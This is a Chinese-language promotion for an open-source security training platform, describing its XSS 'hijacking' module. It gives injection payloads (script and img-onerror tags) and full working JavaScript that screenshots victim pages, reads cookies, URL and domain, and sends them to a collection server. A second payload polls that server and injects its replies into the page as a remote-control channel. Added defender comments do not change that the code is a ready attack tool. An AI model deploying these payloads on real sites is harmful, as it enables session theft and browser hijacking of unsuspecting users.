安全平台介绍
身处互联网浪潮中的弄潮儿们,你是否了解那潮水中的暗流(安全漏洞)?
你是否已经掌握了安全知识,但苦于无的放矢,而渐渐淡忘?
你是否对黑客技术痴迷,却苦于无处着手?
今天,给大家推荐一个工具:kb-security
- 深入的理论讲解
- 丰富的实战操作
- 平台化的演练靶场
开源项目地址: kb-security ,如果能帮到你,请帮忙点个星。谢谢~
kb-security 是一站式的解决方案:深入的理论讲解、丰富的实战操作、平台化的演练靶场…助你,解锁“安全技术包”。
XSS攻击劫持平台简介
XSS攻击平台主要用于帮助用户更好地完成XSS攻击和控制受害者客户端。当你发现一个网站有XSS安全漏洞,却不知道怎么利用时,这里有一站式的解决方案,帮你完美劫持受害者网站。
- 截屏攻击
用途:主要用于获取受害者的:站点、请求url、cookie、页面内容
- 当发现网站存在script标签注入漏洞时,注入如下代码:
<script type='text/javascript' src='http://localhost:8080/api/xss/screen.js?id=xxx'/>
- 当发现网站存在img标签注入漏洞时,注入如下代码:
<img src='1' onerror=document.body.appendChild(document.createElement('script')).src='http://localhost:8080/api/xss/screen.js?id=xxx'/>
攻击效果如下图所示:
攻击代码实现原理:
```
// Bootstrap stage of the "screen capture" demo script: it runs inside the page
// that loaded screen.js, pulls in html2canvas, and arranges for ajax_xss() to
// run once that library is available.
// Defender note: the script load below targets a third-party origin, so a
// Content-Security-Policy whose script-src does not list that origin blocks
// this stage, and the request itself is visible in proxy / browser network logs.
let head_screen = document.getElementsByTagName('head')[0]
let script_screen = document.createElement('script')
// Container for the four values ajax_xss() fills in and posts.
let xssInfo_screen = {
img: null,
cookie: null,
domain: null,
url: null,
}
script_screen.type = 'text/javascript'
// Runs when the injected <script> reports it has loaded; the same handler is
// also bound to onreadystatechange (presumably for legacy browsers — confirm).
script_screen.onload = script_screen.onreadystatechange = function () {
// The page has no window.onload handler: collect after a one-second delay.
if (window.onload == null) {
setTimeout(ajax_xss, 1000)
}
// Unconditionally overwrites window.onload, discarding any handler the page
// had installed; relies on `this` being window and ajax_xss being a global.
window.onload = function () {
this.ajax_xss()
}
}
// html2canvas is fetched from an external host rather than from the page's origin.
script_screen.src = 'https://xsspt.com/js/html2canvas.js'
head_screen.appendChild(script_screen)
/**
 * Collects a rendering of the page plus its URL, cookie string and domain, and
 * posts them to the platform endpoint configured below (localhost:8080 in this
 * demo). Each value is read in its own try/catch and falls back to '' on error.
 *
 * Defender notes:
 * - document.cookie only exposes cookies that are not marked HttpOnly, so
 *   HttpOnly session cookies are not included in what this function reads.
 * - The request declares application/x-www-form-urlencoded but the body is a
 *   JSON string; that mismatch is an observable trait in request logs.
 */
function ajax_xss () {
// html2canvas renders document.body to a canvas and resolves with it.
html2canvas(document.body).then(canvas => {
try {
// toDataURL() can throw (e.g. on a tainted canvas — confirm); escape() is the
// legacy global percent-encoder.
xssInfo_screen.img = escape(canvas.toDataURL())
} catch (e) {
console.log('截图异常!')
xssInfo_screen.img = ''
}
try {
xssInfo_screen.url = escape(document.location.href)
} catch (e) {
console.log('获取url异常!')
xssInfo_screen.url = ''
}
try {
// Only script-readable (non-HttpOnly) cookies appear in document.cookie.
xssInfo_screen.cookie = escape(document.cookie)
} catch (e) {
console.log('获取cookie异常!')
xssInfo_screen.cookie = ''
}
try {
xssInfo_screen.domain = escape(document.domain)
} catch (e) {
console.log('获取domain异常!')
xssInfo_screen.domain = ''
}
// Asynchronous cross-origin POST of the collected object to the platform.
let ajax = new XMLHttpRequest()
ajax.open('POST', 'http://localhost:8080/api/xss/screen', true)
ajax.setRequestHeader('Content-type', 'application/x-www-form-urlencoded')
ajax.send(JSON.stringify(xssInfo_screen))
// Logs the server's reply to the console once the request completes with 200.
ajax.onreadystatechange = function () {
if (ajax.readyState == 4 && ajax.status == 200) {
console.log('执行结果:' + ajax.responseText)
}
}
})
}
```
- 命令行攻击
用途:主要用于获取受害者的:站点、请求url、cookie、劫持用户客户端
- 当发现网站存在script标签注入漏洞时,注入如下代码:
<script type='text/javascript' src='http://localhost:8080/api/xss/command.js'/>
- 当发现网站存在img标签注入漏洞时,注入如下代码:
<img src='1' onerror=document.body.appendChild(document.createElement('script')).src='http://localhost:8080/api/xss/command.js'/>
攻击效果如下图所示:
攻击代码实现原理:
// Bootstrap stage of the "command" demo script: it runs inside the page that
// loaded command.js, pulls in jQuery from a public CDN, and arranges for
// ajax_xss() to run once jQuery has loaded.
// Defender note: a Content-Security-Policy whose script-src does not list the
// CDN origin blocks this load, and the later code depends on `$` existing.
let head = document.getElementsByTagName('head')[0]
let script_jquery = document.createElement('script')
// Remembers whether the page had no window.onload handler; ajax_xss() uses it
// to choose the polling interval.
let onload_is_null = false
// Container for the values ajax_xss() fills in and sends.
let xssInfo = {
cookie: null,
domain: null,
url: null,
}
// Handle of the polling interval; stays undefined until the first successful reply.
let timer
script_jquery.type = 'text/javascript'
script_jquery.src = 'https://code.jquery.com/jquery-3.1.1.min.js'
head.appendChild(script_jquery)
// Runs when the jQuery <script> has loaded.
script_jquery.onload = function () {
// The page has no window.onload handler: record that and collect after one second.
if (window.onload == null) {
onload_is_null = true
setTimeout(ajax_xss, 1000)
}
// Unconditionally overwrites window.onload, discarding any handler the page
// had installed; relies on `this` being window and ajax_xss being a global.
window.onload = function () {
this.ajax_xss()
}
}
/**
 * Reads the page URL, cookie string and domain (each in its own try/catch,
 * falling back to ''), registers them with the platform endpoint over JSONP,
 * then polls the same endpoint on a timer and appends each reply to <body>.
 *
 * Defender notes:
 * - The collected values travel as GET query parameters, so they appear in
 *   proxy and web-server access logs for the endpoint.
 * - jQuery issues cross-origin JSONP by inserting a <script> element, so a CSP
 *   script-src restriction governs these requests.
 * - document.cookie only exposes cookies that are not marked HttpOnly.
 */
function ajax_xss () {
try {
xssInfo.url = escape(document.location.href)
} catch (e) {
console.log('获取url异常!')
xssInfo.url = ''
}
try {
// Only script-readable (non-HttpOnly) cookies appear in document.cookie.
xssInfo.cookie = escape(document.cookie)
} catch (e) {
console.log('获取cookie异常!')
xssInfo.cookie = ''
}
try {
xssInfo.domain = escape(document.domain)
} catch (e) {
console.log('获取domain异常!')
xssInfo.domain = ''
}
// First request: sends the collected values; the reply's data.data is reused
// below as the `id` of every poll (presumably a per-client identifier — confirm).
$.ajax({
url: 'http://localhost:8080/api/xss/command',
type: 'GET',
dataType: 'jsonp',
data: xssInfo,
success: function (data) {
// Start the polling interval only once, even if this callback runs again.
if (timer == undefined) {
timer = window.setInterval(() => {
let form = {
id: data.data
}
$.ajax({
url: 'http://localhost:8080/api/xss/command',
type: 'GET',
dataType: 'jsonp',
data: form,
success: function (data) {
// Whatever the server returns is inserted into the live DOM; jQuery's
// append() also runs <script> elements contained in an HTML string, which is
// presumably how the platform's console drives the client — confirm.
$('body').append(data.data)
// console.log('JSONP_DATA:' + JSON.stringify(data))
}
})
// Poll every 1000 ms when the page had no onload handler, otherwise every 2000 ms.
}, onload_is_null ? 1000 : 2000)
}
}
})
}